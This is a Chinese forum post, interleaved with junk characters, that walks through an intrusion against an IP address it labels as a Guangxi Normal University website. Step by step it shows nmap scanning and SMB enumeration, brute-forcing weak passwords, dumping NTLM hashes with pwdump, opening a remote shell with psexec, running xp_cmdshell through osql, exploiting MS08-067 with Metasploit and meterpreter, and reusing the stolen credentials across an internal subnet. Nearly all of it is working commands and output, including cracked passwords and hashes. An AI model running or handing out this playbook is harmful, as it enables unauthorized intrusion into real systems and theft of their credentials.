广西师范网站http://202.103.242.241/
* v- z4 z0 ?' z2 E" l4 E6 x9 f; r% O- B9 M% j1 o
root@bt:~# nmap -sS -sV 202.103.242.241) j* Q& G6 t8 K3 X2 H8 U
?3 n7 b5 L6 qStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
5 t. e# k, F- r$ b+ \7 T2 L
3 {* \9 t6 z3 X3 R6 CNmap scan report for bogon (202.103.242.241)+ L4 B3 D" a6 o5 y8 @4 d
. G: a; P$ Q: Y7 T2 B+ r" L$ HHost is up (0.00048s latency).4 m# u/ v; d, d2 ]! e. a
+ }( h' y$ z5 L0 oNot shown: 993 closed ports
4 o5 H; _) c9 S" u2 x [- d3 F6 E7 {3 I1 \* u
PORT STATE SERVICE VERSION* ?+ ~# ]8 o$ ~+ ~# S0 ~* l: N/ y
/ `3 l; R! q1 w7 M! G$ _% W3 u
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
+ S8 i8 a- @& L$ T3 M1 B, s0 r3 A' N4 n+ @7 K
139/tcp open netbios-ssn
; f# `) B+ q6 {7 N0 o1 f/ z3 O n4 _3 L% w" F3 W3 @
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds2 D) g$ Z/ l5 o8 G1 P7 I
$ B+ f0 c5 c; t/ }+ @& [: l
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)8 Y4 x) Y* y3 W$ @8 X
7 C/ T6 ~7 p0 |+ V: k, V8 x1026/tcp open msrpc Microsoft Windows RPC
6 r- d6 u. z4 ~& o1 e3 a. o- k+ [: P7 K# T M. X' K1 T
3372/tcp open msdtc?
4 N$ u7 m2 }8 Q \# q& ]! {" z- H; R3 M1 A
3389/tcp open ms-term-serv?7 H; F( v. b$ G: W
& c# G1 }- a8 [. z8 X' }$ T" o- S$ H L
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
9 o9 N q2 m |! Z) e; @SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
# u/ z; q" ?& P6 |8 P8 H8 }& {! O: }2 Q5 I: m9 z# ?% M+ H5 X2 e
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions" m/ K% {3 ~) R9 X3 v
& A3 b" `+ p s6 j+ D2 K( JSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)) B8 K; Y* m; _4 |2 W/ n
- W& p! t, x6 p9 `/ Z6 @5 W
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
3 i$ r* [2 r' u5 g* `5 C$ ^: l1 G3 e, d9 N
SF:ptions,6,”hO\n\x000Z”);6 e5 }* w. r+ b$ E+ i
! ]5 }% _+ f& V }
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)8 {4 _* \7 [; ], f
( b8 R( Q) H9 w# L& K- R
Service Info: OS: Windows
& o4 t4 b2 Y) n7 l2 q4 a& @/ u% \9 q9 i' w. E. m; j0 m/ m; j
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ ., a) _. Z& P) [
6 o, N6 S) f) A: n
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
% m8 J- N; L. a. ?0 {6 O9 R. Y3 s" x1 p# ^9 i6 @+ E k- ^9 g' ]$ L
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
' S& N: ?$ ~6 u9 Q) m0 V! x! U) D( y, b* L7 j& M. ~9 J9 J
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse; n& k: Y! n9 O: W
+ L5 o3 z0 G6 t, |
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse G7 d1 M* Z3 v) O" g% M
6 m, u( a! b; @8 T# H-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
& `& P2 ?7 q3 `8 z7 _- ~
0 L6 H; A9 ~$ o5 u/ u* A: G-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
7 M, T; f1 Z5 C c
( n \* @- }# T-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse4 n- M& k; r2 w! O
6 n, }0 N5 s; a- B; f-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
6 l, {4 b2 G9 T9 F4 b' k% j$ g
. }5 Z+ q6 x; M; z% p7 A, |% x-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse8 _& f2 { S4 i. E; f Y. `0 G
7 {; H9 i5 Y; w3 \ _$ H. g% x
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse9 D6 v; \ y+ q
+ O0 o1 O4 @8 z( V% i
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
+ o; }+ ]4 j" S; m' x8 [% B8 r G7 d, y5 `3 Y0 V. ?1 Y" K
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
! i, _2 \" }+ A4 G! z% N% L
* Y1 {$ ]: u3 Q, t l+ K) q-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
; [- }$ }; [/ K* [; G& X5 q$ ]7 K8 C" P1 _* z1 c- {
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
& H% y' Q! x" w( @& Q0 ]7 o, K3 B" b; `
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
. n, N* ^3 Y, b; `
/ z8 ^1 x! G1 k+ L4 X/ Z-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse6 H/ U7 H9 s7 j1 u- Z
0 h/ l$ k) \# T, p2 H
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse& x. z* g! Z! i0 ~( k5 `7 Z, U
9 _- A, S4 \* a' w. lroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 5 m6 S& x* q5 ~0 k+ {3 k% B
1 Y# J7 U( Q2 G9 L( H+ D//此乃使用脚本扫描远程机器所存在的账户名; b; F( N9 `* f# W) m1 U) b
0 W$ w! w+ U! r0 y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
: X, y8 c8 E2 m: g$ k* r
; | e/ N& V; [. L. M& ^Nmap scan report for bogon (202.103.242.241)
- Z9 Q' A Z, T& {) W) M8 I7 E' Q) Y7 P1 i2 X' T1 C
Host is up (0.00038s latency).5 X. C: e/ ]6 o5 L/ B9 ^2 ]/ q
2 d7 q7 `5 _$ x& T$ R
Not shown: 993 closed ports
& G; v1 S$ [ O2 Z
4 F& m" p/ z$ _PORT STATE SERVICE
( G2 A, f# O* T9 D" e: O! i. d; Z# A3 A: t) J2 r' V( v) r) a4 v5 \
135/tcp open msrpc
. m; T, I, O) w0 g, T
9 o/ E4 k# x3 M; i; q139/tcp open netbios-ssn$ g$ o O! c. E: k( \
% L( D+ |( n9 c0 [5 G1 {( `
445/tcp open microsoft-ds8 c8 t% o) n' J, \
, P% L. J r# w# u
1025/tcp open NFS-or-IIS
1 {1 j( g S) D9 B6 M4 ]
: ?. m \1 B5 f+ E- ~# ?1026/tcp open LSA-or-nterm
/ T; I- V; N. u& S5 V b- A9 T1 r* M
3372/tcp open msdtc* g2 Z H0 |4 ^4 [- j% s
, F! M4 ~: f. P4 f# F2 N3389/tcp open ms-term-serv
# `' z) n! B5 k- N* C$ T' K' ?% m: Y2 Z# ]# ^3 e
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
- e. H: {- c2 N `3 v
; C5 z% ]6 \3 g: { @Host script results:
6 m# {( G& n* y+ ?5 p, }2 i" ^" L0 N) l( K
| smb-enum-users:
/ G1 h& F Z" s. U! c# k
2 O' x( i% x f2 O2 z! F|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果' q: e ^; e8 a5 u" K9 a7 C: @. n
7 E5 i' Z. |% I" `/ C2 o
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds- B8 t' r$ o6 m0 o( T" i2 K0 m+ }
9 Y3 `4 q2 Y8 M3 wroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 2 k% V* b; L% ?: z2 V- o- j
+ k2 ^* G7 x' F% _8 P//查看共享
% e/ K3 `: A8 t5 P) P& B9 J- Q4 f* i; b. Z( s8 v! B) E; Q
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST1 Z7 f& f/ p7 ~
! r, j$ ]6 E w& S% o" T7 B
Nmap scan report for bogon (202.103.242.241)% C5 e7 u6 ~% D& u* z, x
/ Y( W1 }* y3 u# @# o2 M2 @Host is up (0.00035s latency).
' F0 k; \& v8 F* d. y& f, a4 b: \0 W& l0 V7 H4 |; Q
Not shown: 993 closed ports/ Q" U& }; l/ d7 o
; f% N, A: N v
PORT STATE SERVICE' O% H0 i8 J( H- o1 v
% c# t- G1 k) ~) |' r- H135/tcp open msrpc
0 M. @7 O# D8 P# ~8 ]* F$ N, n/ E$ L* W: s' ]9 w( ]
139/tcp open netbios-ssn
$ ^. @2 n p2 V8 A1 e6 N7 K0 L, ?0 X. |8 }
445/tcp open microsoft-ds
/ P6 U" T4 v6 W/ t( \
4 X3 o! X6 N$ w9 E' m1 g1025/tcp open NFS-or-IIS
1 z9 b1 O5 b6 x' E' }
% Q# M) s* f, {- z1026/tcp open LSA-or-nterm
, j) {) ?2 Q# g) T
1 h4 W X" T6 i& s0 F! J3372/tcp open msdtc
/ @$ k+ [0 A# l8 B- g( C. c$ z. y2 |5 @
3389/tcp open ms-term-serv
. J4 { t+ r* A P5 s& B- o5 q9 B6 w3 J( c& Q' \
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)9 T4 S: f; X0 ~( O
! @( {" v( J. O
Host script results:& g7 V' ~5 g" E* P# p
" `4 F) c3 G, b4 Y6 ] `7 {
| smb-enum-shares:
( {4 T( {! n, E! }
4 ^; N6 H. C. O0 b# W: @| ADMIN$* L6 ^+ C: B* Z! t7 n8 I% e; N" `
0 w n6 P: c8 J* s0 B. c6 ^| Anonymous access: <none>
7 \, j! I' `7 h: a6 m; _& Z1 S+ C# Z( h! |5 W f
| C$
9 Z |3 N3 A* d& R! s' W! j! o" y! a% j* m, @7 b, m+ |! r: {/ Z
| Anonymous access: <none>$ {' P2 h+ {6 m( s5 Y3 y# f* M1 A6 K
& @ h: f5 m$ Q- o| IPC$
5 ^ O. Y7 x! O" W* A
$ |' `% g2 z( X" p4 U F' Z|_ Anonymous access: READ8 y' a$ N; m( K, A8 ~% b( B7 u
& _# I! h [, \Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
' b+ p- S' R A( `# ^1 y$ S
. N. W. D! G7 w! i- }7 Wroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
; A# Q" A: Q5 D) n' Z
; S6 n% L0 B3 b$ P i! e' G7 z//获取用户密码
6 w$ }, m1 X$ g- U! x$ Z3 ]) S9 u8 `9 r; i$ m$ a
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
3 j6 h/ _; f& _* y0 i$ `- _; A5 j& Q) E9 W
Nmap scan report for bogon (202.103.242.2418). B) \/ }7 ~2 n3 z
: D2 ?( v( F; I5 J: Z, C
Host is up (0.00041s latency).3 f( V, f( ~7 _+ @! l& \, Y
2 I% X* h" R5 }( LNot shown: 993 closed ports
$ g3 Q) [5 [& f+ |$ i2 F- e3 P, U ~- o: `. m: S5 Y% c
PORT STATE SERVICE
, D% h v/ N$ {- S0 i7 j6 {# Z" I3 L2 j
135/tcp open msrpc
7 }! P t, S6 B; D& }3 R
9 E: A3 j6 {( |. C5 v139/tcp open netbios-ssn" @- G; h4 V( x3 k4 ~$ w% y% ]) M, q
% @9 F$ ? N8 q445/tcp open microsoft-ds5 [4 W7 \- U J9 p
( Y. `9 s4 z0 i0 C4 R1 ?0 m- D. V
1025/tcp open NFS-or-IIS
6 C. c! e' I j$ e" q9 B: V$ y2 |$ t
1026/tcp open LSA-or-nterm
! t) ~4 Q: z+ |7 u r7 h, l9 v4 L4 @! z/ ?
3372/tcp open msdtc, L2 h \. [5 g
7 A( k& g# B9 z* k5 ?2 L3389/tcp open ms-term-serv
t) Q1 g% ~3 h6 [) J G- M
8 E `* Q+ y `1 ^, LMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) l$ L3 E! I. d. i
$ h5 `7 O* C/ w$ m) }1 X! fHost script results: x' ]* m' k4 P( A6 K/ S0 x
3 ]' e' H5 e: p8 S( u% B| smb-brute:
. G- \6 U! T' l- L" P9 ~, z" ]: R; Q( ^1 e/ E# _. D+ ?2 |, l
administrator:<blank> => Login was successful
f, h& M* r& R0 c6 Y. V& @; s/ `8 k' u$ L: X' E8 n
|_ test:123456 => Login was successful
* R5 N# S+ ?! P! J) n4 W, F$ l
1 v/ `1 ^0 v# Y% c. vNmap done: 1 IP address (1 host up) scanned in 28.22 seconds1 _0 o: {( z3 ]" ]8 U0 V
7 C( }; {$ y7 f9 U8 ~
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash0 j7 z: E5 O/ t/ U5 x
( } W( @( M/ k8 X
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
6 l7 n/ q* O5 E# U! a' f- g* t- _' J4 Q
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
; D- n- S7 d _6 R H0 P4 M B0 }
. Q9 K% W# q4 M1 ?, S2 |! V% |root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
& l+ T# a: q4 @; ?/ q8 }% b g) j# K& H/ ^( B- ?5 W
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST0 X6 N9 @9 ?! m, F! I
, k+ U& V+ q! `6 K1 M* o+ [% |Nmap scan report for bogon (202.103.242.241)
: w7 \! g N4 O3 w) c$ Y# T
% I7 ]) B. p4 V9 d+ w0 x9 F' dHost is up (0.0012s latency)./ U9 p g0 U) c
$ G: h5 I8 l1 Z3 X- |1 E: j0 RPORT STATE SERVICE
: L9 H' U/ d: ~* o' E9 E/ h! _% A; M; ~. ~# c
135/tcp open msrpc1 C8 ~9 a% w. V
/ U9 H0 y; |% F x
139/tcp open netbios-ssn
( Q% ^. w; ~2 ]& d1 K
! M: V. x+ e0 W! R445/tcp open microsoft-ds
' ~4 s& z( t2 T5 C" q+ O! r1 u4 [! `
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ Z5 g6 _0 p- U3 [( Q6 ~% E
* n M1 U9 c9 c! j4 f$ xHost script results: M1 g& }$ Q" S* D* W: M% n
' u A% A& D& A7 W) z: q| smb-pwdump:
# O+ I2 Q7 s: C3 k2 [, I$ ]
5 r9 P0 N3 [% B( ?6 J| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
# `* b) G m; |7 T
; k" x$ b! Z; Q0 C! a| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
! J: m0 @& U% _" ]4 T
+ L2 z9 H. U& e/ g; o8 Y| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
" F9 \1 U0 Y% D" S7 W2 o# e, Y! x5 p8 |; E R1 F
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
3 A4 C S$ k( o B' o* Z7 D% c X
% }- l7 a' |5 fNmap done: 1 IP address (1 host up) scanned in 1.85 seconds& K2 z, H4 d0 q- Z3 \1 v( _. s
& A$ V8 D) x; gC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
: s8 n9 C) X- |' B6 e$ P) h, N2 v. ]# k9 v8 B
-p 123456 -e cmd.exe9 `2 O) d9 n3 U- s
( J; C" M5 y' z! B8 y7 s: t6 [PsExec v1.55 – Execute processes remotely, `' b. S2 @. U! ]- l7 `( x. _
( n; T& H, Z- ]; G$ E5 HCopyright (C) 2001-2004 Mark Russinovich4 Y7 G3 Q5 {6 G1 Y8 p% P
) j! L$ C* {. m x, o. tSysinternals – www.sysinternals.com# X) Y/ K# b# `3 Z9 J* X% e
4 J) g& g! g2 Q, s( C8 C1 Y
Microsoft Windows 2000 [Version 5.00.2195], Q* O) s& n) [8 B
- I+ V" [* s0 ?" \5 B3 P# F: N(C) 版权所有 1985-2000 Microsoft Corp.
6 A- P& _; q! ~: w3 s8 d
e2 B+ c1 k( E# [, _C:\WINNT\system32>ipconfig* O0 E3 ~6 M0 a, s
8 ^: K/ b: s8 z$ c
Windows 2000 IP Configuration
$ h$ A% b2 y7 ^, n1 ]1 z* S2 D3 B, g3 G5 ~+ j$ _
Ethernet adapter 本地连接:) Q4 R6 L+ i3 C1 O1 j
u. w- K8 w+ L8 c* O7 n7 R% |Connection-specific DNS Suffix . :
0 ~3 b5 @% X4 b4 j" g
, g Q$ d/ s' Y3 }! TIP Address. . . . . . . . . . . . : 202.103.242.241 l' `3 ]) S& F
% _" E5 l! M- d- A! i7 m3 n' _4 n; S
Subnet Mask . . . . . . . . . . . : 255.255.255.0! [% i, c# D% x/ X- ^+ G, x6 e7 B
' |: w; P' Y# ? b
Default Gateway . . . . . . . . . : 202.103.1.1) ^( @3 @- u/ N3 ~: ?) Y
; i/ y: D8 S6 b/ e" I8 m4 r# q5 @
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
s8 k% x2 s# ?
3 `# |4 P/ v8 E* croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
! p. V; |1 m" L* x' ~0 h( i. T
) ^" i% l0 @7 [1 b" |8 a# ]Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
$ K- T6 \& c1 n6 n$ P
$ R- e& ]1 V. xNmap scan report for bogon (202.103.242.241)
; ^* _& ?/ w! C1 {1 {9 ~+ b$ f& B& \, R1 C
Host is up (0.00046s latency).
5 v9 I7 E8 C+ `9 m+ @/ R' I
5 N' F8 Y" K5 I& S: d& zNot shown: 993 closed ports* x" A" w; `; V* _, V% T, l
5 e/ Y4 t" |# v3 `5 Y2 k3 r& ePORT STATE SERVICE0 U" n# |8 Y, n5 @. k. d
* I6 A0 K& q5 S- K% y$ P$ J1 D" |3 d
135/tcp open msrpc ~1 f0 w( f `& \/ }$ ?
/ _5 d' Y3 \* w F& w9 N" f2 B
139/tcp open netbios-ssn% G( S/ j: p$ {. `1 x
/ [( f" [, h6 a8 P; F% |5 U445/tcp open microsoft-ds
/ |& [/ [2 u" t, ]2 {1 {8 q( ]. y0 ~
$ f; u# ^; j! N! `7 J1025/tcp open NFS-or-IIS
. ^+ Q: K$ f4 Y+ u$ P- V
' r; \6 A, ]" E6 K+ m( n1026/tcp open LSA-or-nterm1 N6 D" o! k8 v' t2 q( h
P4 i/ I3 n t+ w8 ~$ A- g2 d3372/tcp open msdtc( y8 p4 o- ]' v+ {2 l
6 d4 ? P& p) Q1 J* \) f- \9 u' q3389/tcp open ms-term-serv6 `+ e2 v% }9 q7 R1 _1 s
: S/ q2 c5 z9 X4 K3 ]" Q" @
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)" ^6 e& `4 g. x* V. O5 |) Q
* \' a. J( t- J( y
Host script results:" g( {2 n: F. O- \5 k, [
+ }; n& w! C5 P( r. `/ H4 S| smb-check-vulns:, W6 Q# M1 Y3 z
6 X5 I! k R4 @) D+ o! _ j
|_ MS08-067: VULNERABLE4 a- D R& ?, r; C$ s) c! I
) Y! ^/ @2 H1 {1 u
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds0 [7 r: ~2 s w( T4 G! |
# b; {+ |, s) F& G: Y
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
& P" m# h0 \4 M- Y9 _9 ^
8 m" J. @: O E: _( U7 Mmsf > search ms08
5 C" ~* \' _: i( N- y s; f' p, x& O6 n( x; D* {5 d# {' g
msf > use exploit/windows/smb/ms08_067_netapi" y- K- ~) J1 Q
( S6 |' h# x; X" A5 w
msf exploit(ms08_067_netapi) > show options# ~4 Y3 M) u. \: j* ?# v
( _2 n0 z1 N3 L$ Hmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241- b, g8 A# n: c. R* P; g; P' u
w7 Z' Z* I% G/ Vmsf exploit(ms08_067_netapi) > show payloads
! ~" K5 }5 v7 e: z& W, ^( I I% H. D1 c5 p) |6 Z
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp# a6 V) G4 Z6 n7 g
: C8 C+ h5 l9 M
msf exploit(ms08_067_netapi) > exploit
; _/ X7 Y. r6 X& ?. J0 K$ ? f8 C U8 v( _8 c' Y' h
meterpreter >- _( [) i+ E6 d0 V& l3 \) d$ A
3 N+ F1 j/ d$ fBackground session 2? [y/N] (ctrl+z)8 E; e3 O6 e( n5 `$ G2 P7 A
4 L) b' t" q& w3 r8 Y* |4 J! N) t
msf exploit(ms08_067_netapi) > sessions -l! c, y6 d' B; G' P7 ?5 g* u
" v- ~$ O/ @( a5 \7 H4 Jroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt, ?7 [; N3 z$ G- M; `$ ~0 T
; q9 Z4 U, ~% b4 S$ Ntest! b7 P4 q' F( G- M! G
8 e" @ O2 c& s1 v+ E; x5 `administrator8 l/ y- t( s/ ^7 \( v: Q
$ m7 q; z; _% ]: ^4 _9 Croot@bt:/usr/local/share/nmap/scripts# vim password.txt
; N# C6 V u. U- N3 o) Z" l" O" c* Q+ p: z' f/ Z
44EFCE164AB921CAAAD3B435B51404EE
; ^, s# L5 k; n1 B+ k9 C( r. t% B! q6 F
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 2 ~3 p L# k: o% E0 x
1 n! k# C+ G' h" f3 C
//利用用户名跟获取的hash尝试对整段内网进行登录
4 g, B( J$ c+ Q5 X9 G# s; Q
3 \5 ~ f) y; c& s0 c4 KNmap scan report for 192.168.1.105
0 [0 n V" R6 M$ E; |
% I$ k: I$ }. j% @9 T$ ?' x9 R. @Host is up (0.00088s latency).
, C. W7 [- \6 c. X
% k/ P2 f6 T7 d" \/ K! S2 _5 `Not shown: 993 closed ports5 h% A' s( X( ?- d
6 B" ^/ o& R% `3 g
PORT STATE SERVICE, k5 B, Y. W4 `3 l
4 v% D' O( l' h% u$ z4 ]/ S! X135/tcp open msrpc
; d# f1 X# G8 [# t8 W7 U
, p* A& v3 T% Z/ b7 c- Z139/tcp open netbios-ssn8 g0 B! J% f$ J- p' C& Z# r
! z- ]" W! ^2 ~, T445/tcp open microsoft-ds$ q, `2 K: Z2 P& _
8 v7 b: K% A0 S# I" a' @
1025/tcp open NFS-or-IIS
7 b+ t$ g% H B8 _% R. }8 x) p! w: s7 ~ `8 l. g
1026/tcp open LSA-or-nterm
; v, I y/ `0 @& F+ o
) k! }, ?( q+ }3372/tcp open msdtc! }2 c. o6 D( j
3 Z. j8 F7 b: {9 A$ Y/ B3389/tcp open ms-term-serv+ c: Z3 B7 s4 ?. Z
! e7 u, B4 G7 w% y aMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 y1 i9 S9 Y) l( Z! a2 _7 [
9 U- L, S. m. p% E2 x5 T" Y$ Y; |4 }Host script results:
$ T' u h9 O: y8 K3 l3 S# r
) g/ E, p4 e" ^( q, V% L$ k2 K| smb-brute:
% I% h! j# j; O; m0 A9 L
& E+ A* w. u0 d" S|_ administrator:<blank> => Login was successful
& ]* [/ i {8 L# V& B0 Q7 o4 Y
/ j2 q/ \0 g) ^% W3 t! ^% g攻击成功,一个简单的msf+nmap攻击~~·
5 ~6 i7 J6 W8 h3 f B7 V! ?8 b8 D) i5 |
|
发表于 2012-12-4 12:46:42
收藏
支持
反对